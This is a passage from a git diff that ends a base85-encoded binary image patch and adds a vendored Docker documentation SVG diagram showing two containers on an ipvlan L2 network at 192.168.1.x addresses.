z_H3YIr6+5I_UUF<;f=rwn-Etn)8+&48!by{fVZ^xQvs8;$)L*bu|Kn34*uLBziV=-
zgQ2tj(<umRX=nE7*U$J%8m}E1#5Z>{^LD8YSpL5a1YQWfnB1zrI5^1aRgrX1`-0#0
z@?^eE6Xy1xNP27H6A|AoYiVf-R{@9*dAE)G7C(U(6IfqN9@gP6?&3Tx)8$M{_t#kc
z_+1c1>W}{0E_+58F~{^6s>XFT*GEU1VgdYWvmGYU{#7ak&gr7u8~<MW*2c_9a}asr
z3kg4-Sqa!qC+&9yG|mV;=6D!G*|^R(CF^e~#tx%zs}hAHLI9Unz`yNW0WyBQruy=H
zepegdd4vAaL?QO|ZJfYs@H>kCQpQaqsE#~pGnDU-zx%p2coe&^WxpC^{J8yg>iUcB
z%<DcxSY~=??FY#BpR5=`_kA<+8{xl%Ip`aLzPr5Y>7KQjsT?Bq<mK<Lb*m}W5Ir9r
zYW!EO*y5ShlX`Jz;DftR5mbTtyC!act4QBUfZpJ)^ljIllh?5|-I<`*7v$*NxDMc7
z!a@G?|INR*<Z@lPEuuzo&MdBMuz0@L$wGPad}@O7MRAD9#YoD3%vc40ava<b5}2ki
z%>dlr`&9xqW?QAb=F-~Fo>p?tUcAn#FZ%z<i)qq_;h^dNR+R{zYb(!mdX1m|Ww^fi
z8j6ehwX=gM|B#Zp<H^<Vf1K!!XBG@@fGOAhxUMZe$32LA3^!+lhe-l(d%AUs&=c|7
z&edMhJ9Z`&>HfHa75l%zM<BM(b;#(w;(5OvpRv4ujM$No{gwyk6ghuk9szg-A-IR`
zf_x8njzOnwvuWCp-<43m<x-_(Vr(V&<B<KfU-ACbb{mWJmS|Bs2wjP)X`a2_A06!&
zN_e^nCp78s2|rR}PNjyG9=vwL966w8gT9t98tRH8JPUkDKnQkguGcoJSS_lcy4Pgh
zL$SV!;qhRcI>}?u=B`eQLBl``W8T#~K}l2*i);+X6tjk1<S^W33n3>od`E<g`OqIz
z14#9^;Ae*qF3?wS05jz+iuD(KHRP)vXD*G1klUP1JV~#Ay5@d|Vy?rt;F03K==tO0
zT7~9lC^gYqyK|AQaw~&jahr8`NP#><<XoPYQ_R4p>Y=KV3#P-k7eqGT4vqwhBlo65
ztTaME%Y#Jh8FkdQJSCx#Hr{%JIXeBPR7JPYBK2Jl#-%6PY5G~ph}q1Wt?czkwS`X{
zyc6%}J&qC-5yAmc{s#k1o`37J4Xe|z&0j{^Wbsn}T(zBQ-+Ay@YOPaH42kKAZQ&~o
zB;#$xe&4N1i)V@I25-gNut0?(nZyyoHsN*cK3%6vsLeQdDv^v`n3=ihh{qwe2X-y+
z|FzN;nV|12mLS?6gb7Nm;H%};AHZnUJYw6~Ak#~YsV!^wU)p9i(c;2-41MTa>HF@U
zb|^cRS!3_pl~O{)sndA!Gs>b5d+xKweeuF;Mp*FzY9WX{^~bLnFzN&Eyo??MJ1CIW
z)+_Lb4_dgOBTwXzsqGPs-Rn1hlBQSq#x(L?H}XiEh<^&NuH^7bVU_2$<BI&!-qG(~
z)(4qM#|{_>c%Lf=rdmp3Ika3ZNCpvIcWJ>I;p2pp4KJ*Y$bb5iMrlIp-YpUQ-XPY<
zVsD;u#DWo`$DmhnSi+;|o5sRg<yWUr(Tfykz_v?-z%8^2{z4{^2zP)@!Gfk;sgohM
zZlC<=M;(FSc>Y-d$gV<!*pw&Ekkg8BStzXRIm&##QR9g1JqcOd%o3$9$B0I^zbo^r
ztOj>u&8I6~imjCdd2~-T-1k59YaGA&iaH<IOFU*9iBL4p^JKnHSCT<_H))(C6|%mS
zAV#i^#~<*}v<Xk1jsH)#91u+7*I3kM%qcyz`5LI597=Cf1rNTW(NWtF6mhXhh|DpM
zdTa^MZfLZdedv{>Ii)8SWJp6&U?3zxQ1yobk<|N-nQ1@dcLG>1g#7Lk$$dV7a4riS
zs>4Lzu_K-6tmmAPPXBEKlk0x^yd4W-isCyB$!GCO@vaYg+0aDT@fI)NvHW!XA7(0O
zL!G1qYjm@LGk1*sHw$`UO3h00EEth@TUG(p5`PLNevikg7>4$TVq+^&&`#B<Wmw9A
z-6YBZ`0~`)P8$PA7E+R%+3eL3b=|<2NCwq)o~8UVm2J_2wl3kL(!8;zr5a!tze0I-
z+~jm%ydJ7KdfubYwIVCG6-`RcUG4T}buy}4M$8GlWi(18Ya5dpZHUyY#oEqglLe`0
zGXWdcqMKS%kbvKnJl_4PV(2X`_3&tFY}GoKx&&J{%&Wwim_qr7SdCa~rA%FwD;-K*
zoSpNiY0DmNw09uoaI0Lg7oDRq5WjSmt!lWN3P~<kiAS?1?04OGqo<{KBGTSpdjsjE
zTQI))fV1vL*2j1T)z5o5-rKo@wne&?0;)Cev}SdVmi=&PYBMoxQ1pi<9~56Fi6qV8
zPDb_VrP|HW(oZ8BIC-Vn=u5Q%XeNB9)rRFnr0L0@@iOr$Gcc=b+CM1MUw`DtV$MJ_
zQyYtRIPpIb-)uX-yrvcIQin~lkhc6##R(44hDEF^>Yx^9O}}Dq{44<MS_gc`yv|Wj
zMB!qbP|S4yR*jxS8KLG%o>aJB916HfW>L&MNk!s)l$m9J4V|-Yjd2Usct1c*rDSyF
z8J#b$#-xF7lKcFs$@;E6d{7&<h0s+w5Ap5C$r3+i9r4JeB?BOmFFg6O^I!OXTH#&i
zXkmL+%+*F&D}H1Z&U-V{22O72yz*dtam;lHCk;f`MMg`23JottrphLI2Q59BzaUL5
zw13h)*6OCjkxN^A=-bxL7xHM!_<lufUP0^_IN6sBGRjPper7oTVo)1|uPhpdt?N4J
z2t3vR@{K^*mz;^If#k|-%>ZWkLp|c*1^iFZew;q;1E<o;39q+T?6tk*7)|fiD8Y{7
zx+V|K+|BOM1-VU%UmU6O;?do4Rd$co2ml`(1x}?A7Gu}@F~kPsDxmFiXfj$+#|pnT
zPqNdrW>8r39VGtvpq1!O;q59g-EM_5M5wJ&jy95n3e11Bjc+k%xM~pQm4C;D9XpYL
z^zkQhvUO1=+S^a~@*MMXU(6^8QQ_}bWszEHHs2mlU?DB$hnTbZNvl_Y^{5tmf_kW7
z7>PD>P|{RpgiOT=f`4xi$L>O{N~$sp?L&)Phg>H%Xj+-b>4(QIgl*oh9FvxZmlx=I
z?Uki9PNg&Gs%X*JS7fAzIUEVc6U@EnG7n{XI+SSSojGM>U>dA9yO$6a4*Qq)&8XB>
z$9LT%ZlUkovhbG!Uf2Z$$|El>$JtN>f#bCMWUTop5^VCCKN_#;98u-Qzf(q>r4UR1
z)mHJyRTTa0HPtjfHZt6Qf|2~O>#xC)uqyq*lkW7O<dtVcqj8!!vcm@<?`SHr`kHPU
zGu@c+GyE<XBS0}Idzy&g1o`VkH)pI@9b0MsEA#+>&$F*$B8HKnQsSnoiO(MJPDNmW
zXXV$3TkYN3qkZ^lu&f#%#gN|Is@cV|tbrAx*TBWamFItnJT*?UKUf#?q0kh{_H=*W
zMvb5p%Y}uYRt_-5e|rc5D<n9YSv@)`3R##08+%O+$0m+F;?a~n>AlW+XY=FgYW5nV
z>+tU`KO&)l9xAHYuw(I(rp4zVZ}y6}XE1c$hJEF$M<2&Q_O+Oso6}t`2_5js+?WD;
z2r)vtP-X%_iA*!^>!RCJD-O_vypBKbr0Nk$?P00TaXSz<god{M4N6rE8yU4}4A$n0
zI6)v{Y_e3YfKuDTwzh8KbT&#5jA&U|V4Db~1zSF)Rbe<N77pb9J~``o6;(31l#KSN
zq;0=~y1WN%A}Zqx`(E2UVu@Ek3xo5#$)Q!RT*y%$!0#G05^woav>~|=(@*#;%gqky
z)Kv8hX8FE<x&v~iUp0Xbz~YaIZpHHQ9%vrI38Vr)a`UKl^3@8C1T7(9lIGL7B6cm*
zR2Mr?S53NPbIPdqL!ytzjj}kJz%*3-;>Zk=v#vYx1k_F;t1kd@(keVNT3UEMf2P#U
zF6jI`E?gig`BmUU)wh~r5DN}_3Up*M3WuI>+1#B_7woHJL1}Jnk*es@^USNzTNT6h
z=N*c+xTK_H1voS`R2vo<8Mz#Qjg74dq@_*6QQmr8>aZ{|@;n*4lisAb2Xuq!(0CZ_
z8L6>kG~}feh>PX5aj|@XUnFyL^RNvxjD?G7i1(r%X=}EP+FUn+7js!$&YIhfY64CL
z+x_xRsL06Jpg37^hzPr8pZ)Bn0j;c*=7V>`l&+-kJR5&>hr>I(3VUj_csveGTCSez
z+>Hf?&@i5<GXFY!=P#D{F}v2^2oB3WqWlbpB7NR_>4Kzz=u6QP4Ri(O_@<u-iybFT
zZgG#hyhbbz2}c^ep3qGL9tTg@e#BF2IH}70Ot&{n)a~EUZ78Hh?j5a@IojFQVh($;
zG1n%%gVpTgl~~PR@PDn1DWX-P#_K8Fywrg5#$Q#)PdF#Xlgb)d=JcvI`fe|qZr}g?
z^?KiGuCHEh#DVXYf>9zL!|>6zhQ!8OaJDk%W&G^rh0qe!RwFTGZb6|Z){|6HO0lno
z_-RWgnH#>kQU5)Ji7Uw7c6qY3>+@5cQRFwJ2K0Dw!cyeL>YX(Nr5|aggseJoPnQuW
zDDtcLf^<)D=Pg+$MNK0Xi^&eIAH{5QF@yBZM-9N{0YuD#P3x*TOs;~3nh6m6$*cK&
z&9K`5=9>)tP3wb6L&t9E<%yNzpm3W|7i+tg0*{Z^^801*SFx1uj}8YFwj1h(xR|yq
zON-+tRS6c7<ipCN^0f*jZPEVDooTP@&Y@0D+#8}}d?UPi*TL;r#_itR=<59-RtD+|
zS6ZwBoWuzIR+b94mS|^sx2C4L7W7<tL}yP?tX)fP`+faGt=CHX<;n+P-^J-&HnVHZ
z>#x|2wb)VLnsd>Q@*h%W$Bn^|rEM_dJI@MY?Rurq&YY3?@QR>cztxq`qR!X0xEi4w
z1ZH~?=0G?)ieKqxuZV*f+I}y}$6xV0Je30Pr)gnefX97=q&%OuV%=mp1MKOt=g&RO
z2u>v>)?;mT%BC)(P;@fXhB)GgTsF(7&G@ieJ^uJETKAkNks!L=(bSMeNNPk>kb7-q
zeae=F{aU2IYS<WM?dbcIT<!Opwml!~{X^e4pA%_Sb()iqT4mexCVFIY|I6XMvA(!d
z8hTx#SJVf)eSZ7&an%cF1GC<Kex>GMu2pM6I_Z&kq&C!k?3|$J<*npK@v>=4TXEw4
zKNc2K^j-Zy!zaxrc~Aw{e9_h3<#nD-;w&7&qRXGLZTf3mxkdLSoNw1N`tL1@3c<xR
z0r)m5Iq(Jvnf&s86`6?Sh*MF{-X9HM5_@e}%@W(H{mT7*7n{s*#AI7n__XBg>8#oY
zg3t3_PY>%}g;8+#FC)t02H^-fe#REeOti3|FnBq;+rDZ{R?qhT1-F_jwfOlv<Fijk
z9NQbZNi;RHTin7XJ>2xTZ+-Q5bkc}5Rj=YJ(kfT^WMiLmwaxlXw1X~SQaIquj6l%#
z$*_!JtuSpLwk-+y{UxD^G+S|wX#FH@m=|OA?iNC_?F#$Skc56=*8ShUUFGT6h_%h3
zDuW+X(^+h<PDi=CQM<mEe^{Bd0*>cD`<ugFa_OMUcTZXAQeItByq+J{iS+>-^2oBB
zED1w>$or-H8^9bPN(hqe@J4%M4Nws{27yY|*jxlrE)++tg3=2+JbzZ2Ht-15TzK2(
zEq@uGva_@>V@*r=f#R=^#tFA#S;+~JCLezy#kdhPvTm=@ZAard>^n4z6qqcAIr~g_
z#zlSVwb9|mvC)lKK8gH<45w_q2$fRdOU>ZG%?fwY1k)=DIMr@iid2LJV%i*cvHJxC
zeK-iiNwsjoCc9#5IW<UL=P$0NqZ3>hHip{oDWoEzKd$WoG{m^-&B@+J*vHuEXhEED
z?|T86vw&w*or*ZAt83}swy@B_|5L@4heN@2@iB<TmL<#>+lyphifqZgWQiDiWG7T8
z`#xoC*(Qx8WNT!X$Yh%g4GmdJV;}n(2H8S=qxX;R`|h9TxxahQIrp63xzBT+=WO=Q
zvv&xkTVy$y2nDO7>hr(8kj?NYZD5}*E(}&iqqr>BZQ{l-<4a|ZLzRzN`e|QDzCgw6
zfaMiSn!lqWoAY!Rog+XkrjUS?%ah~rWqZN{^AZWtEs-h$=E$*ep^NvYb}u!eHgLjl
z{IRL(gGx$XK1gG!i_vv3rw?jw(0%yz+=9LHr{&*^N*uX82v}xIFilM3EqE#Ex_W4P
z42NiqPMkynkB`8mg*LM~Cd9L8X8-v#;clUNVMJsUFLrmG$>g@t-Q(RLtt>j0<I`h>
zz!E`aE|&d;%2fEwG`Y7S27mk{%Ej!}8I$ADwDz)&CvepPARixJ0j*klw1HqLiaLz*
zu$|mTqo7W7AJ})o+B`9L53V0O$*IzmZ68%Dbp~8kk>pQmK-R>Fo7=$|wW=)mcnNEX
z>TF#uy8Y$~Vt(ohZd9CJ)b6o**~|?SuF4B4ul}C80!~_3Ujr2*?{(!fjSjobZm&5~
zJC1vPed|ZaULhXuN^`*yK0CYn=B#1w6>oKqS+kdSOOWb9dlLjuw&-)R@h#9y)D{gU
zW0NLSpF6K|)Xljy0ay}!EaWCFnNqC{*3O+N1Jeq-gekxBj6F!KmdH&0^>9H?hFgTG
z!;ODkzV#q=_^Q11$Kr{;nJ>lfyp7DnmQWJ=N#oqo2t;QslVI5Ji2?o}na>QCp@T#V
zE69-}5-}t<H3K`$JO^hesmw6S%ITsT)kyp39{do3P8CR9a3K4Y@z5QajOWcn#6hQ3
zH68j)Tmm024m*AWr7v6m@vdqJP;wdCf9f<^+K{A`U-V-!rhs-@P{ZfBF+nBm7tr2i
zY2|1Ns?^UBitrFBqGn0~Z}_L3H}DS^7omMhG7uZGCe%$*TJ3$ppK2mjkxGU#W{dX~
ziwmEv$^~Io0fx86%_}9%TvJ+bbg=aKcdANhC9v4U{(?A2U?s}!sbEL*Y%si8;4#gZ
z=Ke31dFVxF%YoXZKf3fe(SxXFk<vt%h78?LNit7o77o)b)ZGYv)U>T9hPod_#wgw&
zDk*mX;;kBl4Sl)0bO;`w!1Fxbnt752v~PYN%)Z7$>I2P~==T<39(;w5N9(v3WIkmW
zd59mlO}#Lz&mZF5o_1Saa?i;A;~6E|(~rvlZV)Bw-t^v_H)E4eu@!t>dDZS+`FE+t
z_OhJ-jR9Z>_-<<CN7BhinWaFJksUgtAFNlY<Vgj)Q3z$V@7~bA>A32giG6D81%G&(
zRCAgWi$9i+g-%x_`00^VV7b7zsW-YV`Mf#*1REgaT+!4Ryu^By*bsYkwdcq|pf!iV
z7am3P(0ku(1#X-A4OHIQ%8M^b*rV=_67D2WU1vD4y8B3Z;o;8#LIj7kG+5-x&K+O3
zH8!NdfWP}KlT;&Xo@HjyAn=hiLrmu_sm$A_6N5@p#^a@7n11aWHs$hT3#-@?FCB(x
zj8Fn3swk#Zk7YotnXl<$P~Is{!cRoT1jX-4l}(eC$BWIS?URCy<K(Xp=<Qu}8Sik!
zo0qc!GULPlhVMDcl|*@G7cQeB1dU?cpI5n;Nd|n)Bvw#MPU1!P3QJ?F^UD=;GpTJ*
z55Xgw?g}-zkmmGaSnF)6##XaUvx7O4I4(bS=SJZY*tJxH^L0pBt))@7E%caP0P-Ta
zw3b`5lN&{i%q-T^hf=J%+C#8YT!W9W3YLfJ4+c~&Q^%&W>WfF|LZ0+a#fAJ;i6MTs
z2Q&}r{8_BXkVcz<19BRgEN<RpD{^4}Z8ythh411n4LHx5_FA}y$$fvv_L<gh-`<qY
z<b`bb^X&X?s=6;hGSagnQ}K`lKlp?aT640IU}iH?_<{#iZ1t?qn8r9+>IV<a-)NKr
ztl{!Rb}Y&J21-Fvb4abvryK()#c3kP2b1R=b{&^7(k<k(i20Yi)YQ}%LMV%qOeT+O
z4gg8~RY=nA_9M(}Lu351{}*D|289#0F4mk$BQUd9&ZL`FduMz3N0wwI*TfTdZCl5B
zS%`+W1r6R1I_va!gijFWnCY-Bx#u+7b)Q`=x%`JOZ2MwnEzZDEQPo6d3R%V|B0`f>
zybHBb4)gL)Qb>;N-i`i#D{k_u!9|eNiNu5H{mf|@1K-<eT@8!zx4uIP@XAi>jqn0m
z_1xEkjfz@j{&L|h$U?(v-m&(p9$rsHu892_Yc2@g($tEoe`6EoQ80uiFcnrRsHFuy
z`1ekO+)nk8FdibDWB0x45%^w@{$!WtkT?5q2BTnh$-mH!+%}X~bkijH$PS0M#oC{z
z==v~Ms~TwhA(`apZZqTa^2DIJDLIAx$V$KB_v~)yQX5);1Eyok`VkvmFiBqhFRpy%
zQ+4Z)?GGtpYFvk_8>Ug;x0HbJex+umjl!_4SRf0HzQDKBpa9(RJ*FuoYoE3(inCc#
z+%Knz9vYVG|FBj$8gf7a-ZB?oA0gaoJD9=T1sXeV`z^%Z8i9Q9pKNqgU9p`Ja$QY+
z2kj<YqnG$CEZT8A9iF+L#QLdUI;8!~3hi263QOJ58s=kLdE3=TYzh6dbiohQdk)Ue
zNvU7cv|TDJcP4^P|KyeMb!$(U<SheO{x>`#6k|MRtzno5!Xe0|Y8Wd}EsBX|!aA1;
zo+O^W9QW8a#8Il?W+-QS8wfADdFkCioB-boKcPGHGDjrlkY(!|=G#L47oLntB&ad8
zdJfh%-H!`F)_%Rya`|T9Acr2<t$VVZ@grJR41|m)eNh#1XXAUYK6G!6($2Kj1wK~k
z<ReSAdIlbH6~m(Sv1W8nBsKEZk|iXhKM+wELu7n8@VN!--1|mul?$->w}sk15+(1H
z=E^P#LrFjL-*YYN|3Fhy><nzbYnMidOUW{=|KOv^m90onA)c?gZVq;g03j=CRCaWe
zk@IX8Dhgn3q$aeHN3CS|+ib^zZ3t<Jj7G&Y-=s`EdZu37%BXNphxH`NiP6@9E&NrA
zr4t+3L6~5Petqh4gIaDO=RJGQIJqZm{Qhx!u^#)dK}1rFXKZkVSQm`Oy8{A!`rWH<
zgd-8v$h#;iu8l{Vaoc&5Db*px?NT_)oIpC0gYoChaL(!X%2%nhyQ<Yi?S<<A4aK~p
zgsFD=YrR~b2T^RAP>)7EA|UOxZ=LwLZUJ;8NyHp6N@5M+40)g1xpq)1b#0CaR41Yb
znbX*_ismgYzu4FFOfY%r63M%p>N!iTh`6uuiW@<z!F$1qJa6jcz$swX6e-8Ot0AL?
z^PBqG&MzJRI|$o=4Ikl<x7J@_1OzXXCO0(QX@6PH$XlqzJv@Ku*^Q!X(d+(oX+Nii
zLP!nd_WmL%rGLDlBKEL=EawY2=(4HPBqqko1udh4)fzM-c~aS{Z?u3`mVuPlP-rq-
zKUzx!)$cvE`u%0@m!pbLeR^M2f4Q0kIDlCF$n>4^gZJk#F1v$8X!JDx;5x(B1aw^B
ziv!@%#~}@6r?BJH8Am7P9M|}3rsl54Y<X-K1Hg}Ya&6UmfE0fy57T+RJPo880B&)1
zs!>zxNO@cn5>3Ln`d!;SwRHE21Tk^1x~Pgs*EnrW>_iT99xEcEPiiYM8oqJ9GBrt|
zbUs@Lx-}L7tKmRY<X4o=sca8KlHcr_)=||K$j6&At0&r$;-8jo%)P<X(cDVl{7%Gi
zE$Wx;K&R(8bR5ERK$|PRfH~Z@mDd+MF{W(A)8J_%_|~r+=t@RHL{}w*4X2NmBPn!7
zr=%N_QHYT-^UqCZ*yEA;J-2C##o;J_O#}krNyWnQf9V)<;-vamk}_BhAlpL<gQ$Z3
ssRP`l!UAJx0So|6fF!^M@IL~5s^e<Lud0h|ZD$BWT~nPJt-Epm0prRoN&o-=

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg
new file mode 100644
index 0000000000..48097dc83b
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg
@@ -0,0 +1 @@
+<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="343" height="311.5"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs><linearGradient id="tFoWDamkeRwJ" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient><linearGradient id="rNGNyECMdeKI" x1="0px" x2="0px" y1="100px" y2="-50px" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#3d85c6"/><stop offset="1" stop-color="#FFFFFF"/></linearGradient></defs><g transform="translate(0,0)"><g><rect fill="#ffffff" stroke="none" x="0" y="0" width="343" height="311.5"/></g><g transform="translate(0,0) matrix(1,0,0,1,77,162.90096991491666)"><g><g transform="translate(0,0) scale(0.62,0.32300163132136867)"><g><path fill="url(#tFoWDamkeRwJ)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(1.6129032258064517,3.0959595959596116)"><path fill="none" stroke="none" d="M 0 0 L 62 0 Q 62 0 62 0 L 62 32.300163132136866 Q 62 32.300163132136866 62 32.300163132136866 L 0 32.300163132136866 Q 0 32.300163132136866 0 32.300163132136866 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#tFoWDamkeRwJ)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 62 0 Q 62 0 62 0 L 62 32.300163132136866 Q 62 32.300163132136866 62 32.300163132136866 L 0 32.300163132136866 Q 0 32.300163132136866 0 32.300163132136866 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,84.45937956643391,158.4009699149168)"><g transform="translate(0,0)"><g transform="translate(-86.91999999999999,-162.47030107315481) translate(2.4606204335660777,4.069331158238015) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 88.95937956643391 162.9009699149168 L 88.95937956643391 195.20113304705336" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,122.54062043356592,158.40096991491632)"><g transform="translate(0,0)"><g transform="translate(-128.46,-164.19297644020213) translate(5.919379566434088,5.792006525285814) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 127.04062043356592 162.90096991491632 L 127.04062043356592 195.20113304705367" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,103.5,158.40096991491666)"><g transform="translate(0,0)"><g transform="translate(-106.14,-164.19297644020213) translate(2.6400000000000006,5.792006525285473) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 108 162.90096991491666 L 108 195.20113304705353" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,35,196)"><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="28" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="45" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="45" y="0" width="57" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="45" y="12">container1</text></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="81" height="14" fill-opacity="0"/></g></g><g transform="translate(156,42) matrix(1,0,0,1,0,0) translate(-156,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="81" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="33" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="53" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="77" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="80" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="87" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="90" y="26">2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="97" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="100" y="26">24</text></g></g><g transform="translate(0,0) matrix(1,0,0,1,168,162.818751317853)"><g><g transform="translate(0,0) scale(0.62,0.3176182707993458)"><g><path fill="url(#rNGNyECMdeKI)" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(1.6129032258064517,3.148433487416555)"><path fill="none" stroke="none" d="M 0 0 L 62 0 Q 62 0 62 0 L 62 31.76182707993458 Q 62 31.76182707993458 62 31.76182707993458 L 0 31.76182707993458 Q 0 31.76182707993458 0 31.76182707993458 L 0 0 Q 0 0 0 0 Z"/><path fill="url(#rNGNyECMdeKI)" stroke="#6fa8dc" d="M 0 0 M 0 0 L 62 0 Q 62 0 62 0 L 62 31.76182707993458 Q 62 31.76182707993458 62 31.76182707993458 L 0 31.76182707993458 Q 0 31.76182707993458 0 31.76182707993458 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,175.4593795664339,158.31875131785318)"><g transform="translate(0,0)"><g transform="translate(-177.92,-162.39526029012058) translate(2.4606204335660777,4.076508972267391) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 179.9593795664339 162.81875131785318 L 179.9593795664339 194.58057839778746" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,213.54062043356592,158.3187513178527)"><g transform="translate(0,0)"><g transform="translate(-219.46,-164.08922440105042) translate(5.919379566434088,5.7704730831977145) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 218.04062043356592 162.8187513178527 L 218.04062043356592 194.58057839778775" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,194.5,158.318751317853)"><g transform="translate(0,0)"><g transform="translate(-197.14,-164.08922440105042) translate(2.6399999999999864,5.770473083197402) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#0b5394" d="M 199 162.818751317853 L 199 194.5805783977876" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,126,195)"><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="30" fill-opacity="0"/></g></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="45" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="45" y="0" width="57" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="45" y="12">container2</text></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="147" height="14" fill-opacity="0"/></g></g><g transform="translate(123,28) matrix(1,0,0,1,0,0) translate(-123,-28)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="81" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="33" y="26">192</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="53" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="57" y="26">168</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="77" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="80" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="87" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" 